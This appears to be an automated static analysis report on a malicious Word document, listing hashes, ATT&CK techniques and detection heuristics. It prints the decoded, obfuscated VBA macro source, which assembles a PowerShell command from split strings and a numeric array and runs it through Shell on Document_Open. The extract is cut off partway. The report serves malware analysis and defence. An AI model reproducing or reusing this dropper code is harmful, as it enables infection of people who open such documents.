Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1d37a9858dc66da8…

MALICIOUS

Office (OLE)

Size: 96.8 KB
Created: 2018-06-19 06:36:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: e942886082515fc8486ecb9eb69b69bd
SHA-1: 4d76dfbaa24063f48bbe94ef3bdc907a62bbb699
SHA-256: 1d37a9858dc66da8bbaf148b5a70572ed3dc17439f6fe4c868a2ceadf9402a72
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristics 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the 'Document_Open' macro executes a shell command. The VBA script attempts to construct and execute a PowerShell command, most likely to download and run a secondary payload. This is a common pattern for macro-based malware droppers.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6603993-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6603993-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
  • Document_Open macro [high] OLE_VBA_DOCOPEN
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14645 bytes
SHA-256: d16475ab1be8bc14443220102947a189e69c0c57f58f47d19759b3692c3d4b49
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GXfzSDiOmJqOD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQLbrLXo()
On Error Resume Next
PMkYiM = CDate(75501)
jdtWH = 48982
oYjIw = CByte(PuUln)
kzljH = YrsTT
rwvFq = CDate(zolcH + Sin(14440 + 60812) * 42271 * CInt(17993))
zEOJUP = 46860
MWiJo = CDate(62034)
dbStLb = 18717
djEtDa = CByte(haDCXa)
mYQhjR = AQYOv
zmQzT = CDate(IfrXjK + Sin(62928 + 26008) * 24105 * CInt(30441))
Cmddj = 87611
DwDHu = CDate(69757)
vktfBi = 60251
NtqAG = CByte(XQPjO)
OoCiWN = SYjzhm
VuhDhS = CDate(iCikfA + Sin(73196 + 81878) * 76359 * CInt(43347))
RCJbfq = 18848
fUsAOw = CDate(54980)
iiVliB = 26179
NJjZjv = CByte(qXTGOu)
EVXSE = jvmmw
HjYhJ = CDate(JlivE + Sin(78467 + 43603) * 80527 * CInt(1322))
simPG = 97365
EQLbrLXo = wLwXHw + Chr$(SIHlauLvzwV + 80 + GOzYkkiSt) + "OwerSH" + OPHsNR + iRkYfXRqzjC + PIUJQBL + whDkhIGTl + vSjADwYE + cSmVuWjiRzw + niEzOU
vwduX = CDate(48506)
ABwlG = 63580
kKJGVp = CByte(jvsaK)
ljQJf = jupwo
sEIpi = CDate(oAKFj + Sin(34152 + 72033) * 33904 * CInt(53621))
DYDOj = 44621
hUOAlj = CDate(66037)
jBUXzB = 38200
pIIYs = CByte(XrOGP)
vmjjp = RtMMn
lBVkOX = CDate(XQITIL + Sin(79667 + 88199) * 72129 * CInt(62913))
mNSXk = 76530
End Function
Function XJjvnpd(NPbjQYk)
On Error Resume Next
TVLjj = CDate(93213)
XKUYAa = 12395
HSradT = CByte(ovQEM)
lKAZZ = GfbbE
FpoEG = CDate(JNaOfG + Sin(66951 + 41366) * 18728 * CInt(51680))
JoQikh = 34016
iWEYQ = CDate(49721)
mUfKzN = 63275
wdrJuq = CByte(ZvwjSi)
uTqrio = zvNpI
bwosz = CDate(QfqZLq + Sin(41284 + 63775) * 95280 * CInt(69336))
bwHWX = 60950
wznOmZjDw = wBiGVSdlG + Shell(azbnI + NPbjQYk + YNcufTpNoq, 67862 - 67862)
nsCUa = CDate(42715)
RwHhu = 10027
UcMrh = CByte(KdzjXs)
IWuzz = ziWPY
wOjzKR = CDate(cwLJzd + Sin(34481 + 62312) * 43481 * CInt(66257))
nGYUXF = 87114
End Function
Private Sub Document_open()
On Error Resume Next
LAfvS = CDate(6602)
hPFif = 71984
ZPrHW = CByte(wSzqB)
iICao = YdWqiN
YCZJu = CDate(dUotRM + Sin(34315 + 27477) * 97209 * CInt(48435))
TnfcN = 43280
AfXkv = CDate(13862)
Fzjtw = 20384
iijAM = CByte(QRJAcj)
pVmlCd = zdHzaZ
ZijpBc = CDate(JjbJc + Sin(58272 + 29395) * 79986 * CInt(99390))
zrYzEz = 88236
Application.Run HaqvcTnmaU + "XJjvnpd" + iwzHj, IAXzFBASbC + EQLbrLXo + iLRSf
XUYjHj = CDate(21966)
kCGkir = 479
zLfkv = CByte(UAWAC)
AYXYcD = EcQdXd
FPlCtp = CDate(kiSvmz + Sin(47886 + 16238) * 77869 * CInt(89381))
jPzja = 56499
UGHpt = CDate(12357)
FokVEF = 31195
wLkoRf = CByte(NjnhHo)
VtCSw = VCtTdN
ZYORwu = CDate(nDXziO + Sin(58600 + 8702) * 88024 * CInt(66432))
MJGYm = 42049
End Sub


Attribute VB_Name = "TlCZdPjdai"
Function OPHsNR()
On Error Resume Next
fBUOAv = 79260
NhBVOa = CDate(pbzUO + Sin(47616 + 41139) * 52263 * CInt(37630))
EnnHbc = 96412
YWGnKT = jVitz
zzmmb = CByte(rLhPa)
rhIQb = CDate(23979)
EJvlAUWESRa = "ell" + "  " + "( ( " + "26,107 , 87," + " 113,73 ,8"
YLKXQM = 23999
RtwVwA = CDate(vQuGM + Sin(62472 + 37866) * 72247 * CInt(55875))
hQiZkz = 33752
NLihGY = VpfPn
CtQNf = CByte(EGADOc)
swXriv = CDate(64907)
GEOhIbGJBi = "7, 30" + ",3 ,30,80 , 91" + ", 73,19 ,81 , 9" + "2 , 84" + ", 91 , 9" + "3 " + ", 7"
hstKkI = 14459
hHimLr = CDate(ToXWPG + Sin(9906 + 65344) * 13930 * CInt(10040))
wRiAp = 46703
YMhffZ = jsYYwB
HYKuH = CByte(jztKV)
zIUvIk = CDate(23855)
SauVKvWi = "4 ," + " 30, 76" + ", 95 ,80, 90,81" + " ,83,5 , 26 ,11" + "8 ,124," + " 86" + " ," + "93 ,110,30, 3" + ",30 , 80,"
QpQKWo = 12019
hRjKH = CDate(QUJlX + Sin(4519 + 95755) * 95064 * CInt(21367))
UASnp = 47073
lowIj = jPDRh
uaNpQM = CByte(JCbJIi)
HvpVWS = CDate(78978)
QYCbljnrL = " 91 ,7" + "3,19,81, 92,84" + " ,91 " + ", 93,74"
vIGEcs = 64399
ITkNZD = CDate(zfjTP + Sin(98557 + 15410) * 17753 * CInt(60023))
OnzhI = 7011
QXlnRj = IilKs
XkcBK = CByte(hjiWjp)
lQGqp = CDate(90934)
DmAwsu = ", 30,1" + "09 ," + "71 " + ", 77 ,74" 
... (truncated)